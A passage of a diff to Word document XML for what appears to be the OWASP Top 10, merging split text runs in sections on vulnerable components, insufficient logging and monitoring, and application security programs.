-              <w:t>While some known vulnerabilities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list</w:t>
-            </w:r>
-            <w:r>
-              <w:t>.</w:t>
+              <w:t>Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date. Some scanners such as retire.js help in detection but determining exploitability requires additional effort.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>While some known vulnerabilities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10694,10 +10049,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>If you do not scan for vulnerabilities regularly and subscribe to security bulletins related to t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>he components you use.</w:t>
+        <w:t>If you do not scan for vulnerabilities regularly and subscribe to security bulletins related to the components you use.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10709,10 +10061,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>If you do not fix or upgrade the underlying platform, frameworks and dependencies in a timely fashion. This commonly happens is environments when patching is a monthly or quarterly task under change control, which leaves organization</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s open to many days or months of unnecessary exposure to fixed vulnerabilities.</w:t>
+        <w:t>If you do not fix or upgrade the underlying platform, frameworks and dependencies in a timely fashion. This commonly happens is environments when patching is a monthly or quarterly task under change control, which leaves organizations open to many days or months of unnecessary exposure to fixed vulnerabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10763,10 +10112,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Remove unused d</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ependencies, unnecessary features, components, files, and documentation.</w:t>
+        <w:t>Remove unused dependencies, unnecessary features, components, files, and documentation.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10778,10 +10124,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Continuously inventory the versions of both client-side and server-side components (e.g. frameworks, libraries) and their dependencies using tools like versions, DependencyCheck, reti</w:t>
-      </w:r>
-      <w:r>
-        <w:t>re.js, etc.</w:t>
+        <w:t>Continuously inventory the versions of both client-side and server-side components (e.g. frameworks, libraries) and their dependencies using tools like versions, DependencyCheck, retire.js, etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10805,10 +10148,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Only ob</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tain your components from official sources and, when possible, prefer signed packages to reduce the chance of getting a modified, malicious component.</w:t>
+        <w:t>Only obtain your components from official sources and, when possible, prefer signed packages to reduce the chance of getting a modified, malicious component.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10821,10 +10161,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Monitor for libraries and components that are unmaintained or do not create security patches for older ve</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rsions. If patching is not possible, consider deploying a virtual patch to monitor, detect, or protect against the discovered issue.</w:t>
+        <w:t>Monitor for libraries and components that are unmaintained or do not create security patches for older versions. If patching is not possible, consider deploying a virtual patch to monitor, detect, or protect against the discovered issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10832,10 +10169,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuratio</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n changes for the lifetime of the application or portfolio.</w:t>
+        <w:t>Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the application or portfolio.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10859,10 +10193,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: Components typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be acciden</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tal (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
+        <w:t>: Components typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10882,10 +10213,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, a Struts 2 remote code ex</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ecution vulnerability that enables execution of arbitrary code on the server, has been blamed for significant breaches.</w:t>
+        <w:t>, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for significant breaches.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10908,10 +10236,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t> are frequently difficult or impossibl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e to patch, the importance of patching them can be great (eg: </w:t>
+        <w:t> are frequently difficult or impossible to patch, the importance of patching them can be great (eg: </w:t>
       </w:r>
       <w:hyperlink r:id="rId160">
         <w:r>
@@ -10930,10 +10255,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>There are automated tools</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to help attackers find unpatched or misconfigured systems. For example, the </w:t>
+        <w:t xml:space="preserve">There are automated tools to help attackers find unpatched or misconfigured systems. For example, the </w:t>
       </w:r>
       <w:hyperlink r:id="rId161">
         <w:r>
@@ -11025,13 +10347,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Testing Guide - Map Application Architecture (O</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>TG-INFO-010)</w:t>
+          <w:t>OWASP Testing Guide - Map Application Architecture (OTG-INFO-010)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11092,13 +10408,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>MITRE Common Vulnerabilities</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> and Exposures (CVE) search</w:t>
+          <w:t>MITRE Common Vulnerabilities and Exposures (CVE) search</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11256,10 +10566,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Acc</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ess Lvl \</w:t>
+              <w:t>Access Lvl \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11324,26 +10631,20 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t>. One strategy for determining if you have sufficient monitoring is to examine your logs following p</w:t>
-            </w:r>
-            <w:r>
-              <w:t>enetration testing. The testers' actions should be recorded sufficiently to understand what damages they may have inflicted.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Most successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful e</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">xploit to nearly 100%. In 2016, identifying a breach took an </w:t>
+              <w:t>. One strategy for determining if you have sufficient monitoring is to examine your logs following penetration testing. The testers' actions should be recorded sufficiently to understand what damages they may have inflicted.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Most successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful exploit to nearly 100%. In 2016, identifying a breach took an </w:t>
             </w:r>
             <w:hyperlink r:id="rId174">
               <w:r>
@@ -11375,10 +10676,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Insuff</w:t>
-      </w:r>
-      <w:r>
-        <w:t>icient logging, detection, monitoring and active response occurs any time:</w:t>
+        <w:t>Insufficient logging, detection, monitoring and active response occurs any time:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11414,10 +10712,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Alerting thresh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>olds and response escalation as per the risk of the data held by the application is not in place or effective.</w:t>
+        <w:t>Alerting thresholds and response escalation as per the risk of the data held by the application is not in place or effective.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11459,13 +10754,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">For larger and high performing organizations, the lack of active response, such as real time alerting and response activities such as blocking </w:t>
-      </w:r>
-      <w:r>
-        <w:t>automated attacks on web applications and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the application and associated infrastructure, framew</w:t>
-      </w:r>
-      <w:r>
-        <w:t>orks, service layers, etc. can detect and alert humans or tools to respond in near real time.</w:t>
+        <w:t>For larger and high performing organizations, the lack of active response, such as real time alerting and response activities such as blocking automated attacks on web applications and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the application and associated infrastructure, frameworks, service layers, etc. can detect and alert humans or tools to respond in near real time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11495,10 +10784,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure all login, access control failures, server-side input validation failure</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</w:t>
+        <w:t>Ensure all login, access control failures, server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11510,10 +10796,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure that logs are generated in a format that can be easily consumed by a centralized log manageme</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nt solutions.</w:t>
+        <w:t>Ensure that logs are generated in a format that can be easily consumed by a centralized log management solutions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11537,10 +10820,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Establish effective monitoring and alerting such that suspicious activities are detec</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ted and responded to in a timely fashion.</w:t>
+        <w:t>Establish effective monitoring and alerting such that suspicious activities are detected and responded to in a timely fashion.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11618,13 +10898,7 @@
         <w:t>Scenario 1</w:t>
       </w:r>
       <w:r>
-        <w:t>: An open source project forum software run by a small team was</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
+        <w:t>: An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11638,10 +10912,7 @@
         <w:t>Scenario 2</w:t>
       </w:r>
       <w:r>
-        <w:t>: An attacker uses scans for users using a common password. They can take over all accounts using this password. For all other users this scan leaves onl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y 1 false login behind. After some days this may be repeated with a different password.</w:t>
+        <w:t>: An attacker uses scans for users using a common password. They can take over all accounts using this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11655,10 +10926,7 @@
         <w:t>Scenario 3</w:t>
       </w:r>
       <w:r>
-        <w:t>: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted softwa</w:t>
-      </w:r>
-      <w:r>
-        <w:t>re, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</w:t>
+        <w:t>: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11772,13 +11040,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-223: Om</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ission of Security-relevant Information</w:t>
+          <w:t>CWE-223: Omission of Security-relevant Information</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11827,10 +11089,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Whether you </w:t>
-      </w:r>
-      <w:r>
-        <w:t>are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.</w:t>
+        <w:t>Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11838,13 +11097,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>To</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address application security in your organization. The following are some of the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.</w:t>
+        <w:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -11887,10 +11140,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Descr</w:t>
-            </w:r>
-            <w:r>
-              <w:t>iption</w:t>
+              <w:t>Description</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11925,13 +11175,7 @@
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Application Security Verificat</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                </w:rPr>
-                <w:t>ion Standard (ASVS)</w:t>
+                <w:t>OWASP Application Security Verification Standard (ASVS)</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
@@ -11946,10 +11190,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">. </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11993,13 +11234,7 @@
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Prevention Che</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                </w:rPr>
-                <w:t>at Sheets</w:t>
+                <w:t>OWASP Prevention Cheat Sheets</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
@@ -12031,10 +11266,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Building strong and usable security controls is difficult. Using a set of standard security controls radically simplifies the devel</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">opment of secure applications and APIs. The </w:t>
+              <w:t xml:space="preserve">Building strong and usable security controls is difficult. Using a set of standard security controls radically simplifies the development of secure applications and APIs. The </w:t>
             </w:r>
             <w:hyperlink r:id="rId189">
               <w:r>
@@ -12045,10 +11277,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> is a good starting point for developers, and many modern frameworks now come with standard and effective s</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ecurity controls for authorization, validation, CSRF, etc.</w:t>
+              <w:t xml:space="preserve"> is a good starting point for developers, and many modern frameworks now come with standard and effective security controls for authorization, validation, CSRF, etc.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12236,10 +11465,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> page, which lists all the Flags</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">hip, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </w:t>
+        <w:t xml:space="preserve"> page, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </w:t>
       </w:r>
       <w:hyperlink r:id="rId201">
         <w:r>
@@ -12257,13 +11483,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>hardcopy</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> or as eBooks</w:t>
+          <w:t>hardcopy or as eBooks</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -12298,13 +11518,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and us</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ed everywhere it was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approac</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hes and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.</w:t>
+        <w:t>Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12312,13 +11526,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires continuous application security testing across the entire software develo</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pment lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> by the size of your application portfolio.</w:t>
+        <w:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires continuous application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -12439,13 +11647,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Your approach to application s</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ecurity testing must be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. Look</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> for natural opportunities to gather security information and feed it back into your process.</w:t>
+              <w:t>Your approach to application security testing must be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. Look for natural opportunities to gather security information and feed it back into your process.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12495,10 +11697,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> can be great sources of functional and non-functional security requirements in you</w:t>
-            </w:r>
-            <w:r>
-              <w:t>r unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</w:t>
+              <w:t xml:space="preserve"> can be great sources of functional and non-functional security requirements in your unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12526,13 +11725,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>You don’t have to start out</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> testing everything. Focus on what’s important and expand your verification program over time. That means expanding the set of security defenses and risks that are being automatically verified, as well as expanding the set of applications and APIs being co</w:t>
-            </w:r>
-            <w:r>
-              <w:t>vered. The goal is to achieve a state where the essential security of all your applications and APIs is verified continuously.</w:t>
+              <w:t>You don’t have to start out testing everything. Focus on what’s important and expand your verification program over time. That means expanding the set of security defenses and risks that are being automatically verified, as well as expanding the set of applications and APIs being covered. The goal is to achieve a state where the essential security of all your applications and APIs is verified continuously.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12560,13 +11753,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>No matter how good you are at testing, it won’t make any difference unless you communicate it effectivel</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">y. Build trust by showing you understand how the application works. Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">and how bad that would be. Finally, deliver findings in the tools </w:t>
+              <w:t xml:space="preserve">No matter how good you are at testing, it won’t make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings in the tools </w:t>
             </w:r>
             <w:r>
               <w:lastRenderedPageBreak/>
@@ -12604,13 +11791,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Application security is no longer optional. Between increasi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ions are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
+        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12618,13 +11799,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">OWASP recommends organizations establish an application security program to gain insight and improve security across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>including security and audit, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture. Focus on the activi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ties and outcomes that actually help improve enterprise security by eliminating or reducing risk. OWASP SAMM provides a lot of guidance in this space, and is the source of most of the key activities:</w:t>
+        <w:t>OWASP recommends organizations establish an application security program to gain insight and improve security across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk. OWASP SAMM provides a lot of guidance in this space, and is the source of most of the key activities:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12646,10 +11821,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Document all applications and associated dat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>a assets. Larger organizations should consider implementing a Configuration Management Database (CMDB) for this purpose.</w:t>
+        <w:t>Document all applications and associated data assets. Larger organizations should consider implementing a Configuration Management Database (CMDB) for this purpose.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12672,10 +11844,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> and drive ad</w:t>
-      </w:r>
-      <w:r>
-        <w:t>option.</w:t>
+        <w:t xml:space="preserve"> and drive adoption.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12714,10 +11883,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Gain management approval and establi</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">sh an </w:t>
+        <w:t xml:space="preserve">Gain management approval and establish an </w:t>
       </w:r>
       <w:hyperlink r:id="rId209">
         <w:r>
@@ -12772,10 +11938,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> from a business perspective. This should be driven in part by privacy laws and other regulations re</w:t>
-      </w:r>
-      <w:r>
-        <w:t>levant to the data asset being protected.</w:t>
+        <w:t xml:space="preserve"> from a business perspective. This should be driven in part by privacy laws and other regulations relevant to the data asset being protected.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12798,10 +11961,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
+        <w:t xml:space="preserve"> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12825,10 +11985,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Establish assurance guidelines to properly define </w:t>
-      </w:r>
-      <w:r>
-        <w:t>coverage and level of rigor required.</w:t>
+        <w:t>Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12861,10 +12018,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> that provide an application security baseline for all </w:t>
-      </w:r>
-      <w:r>
-        <w:t>development teams to adhere to.</w:t>
+        <w:t xml:space="preserve"> that provide an application security baseline for all development teams to adhere to.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12887,10 +12041,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> that complement these policies and standards and provide design and development guidance</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> on their use.</w:t>
+        <w:t xml:space="preserve"> that complement these policies and standards and provide design and development guidance on their use.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12923,10 +12074,7 @@
       <w:bookmarkStart w:id="126" w:name="integrate-security-into-existing-process"/>
       <w:bookmarkEnd w:id="126"/>
       <w:r>
-        <w:t>Integrate Security into Existin</w:t>
-      </w:r>
-      <w:r>
-        <w:t>g Processes</w:t>
+        <w:t>Integrate Security into Existing Processes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12960,10 +12108,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> activities into existing development and o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>perational processes.</w:t>
+        <w:t xml:space="preserve"> activities into existing development and operational processes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13065,10 +12210,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analys</w:t>
-      </w:r>
-      <w:r>
-        <w:t>is data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
+        <w:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13080,10 +12222,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Analyze data from the implementation and verificat</w:t>
-      </w:r>
-      <w:r>
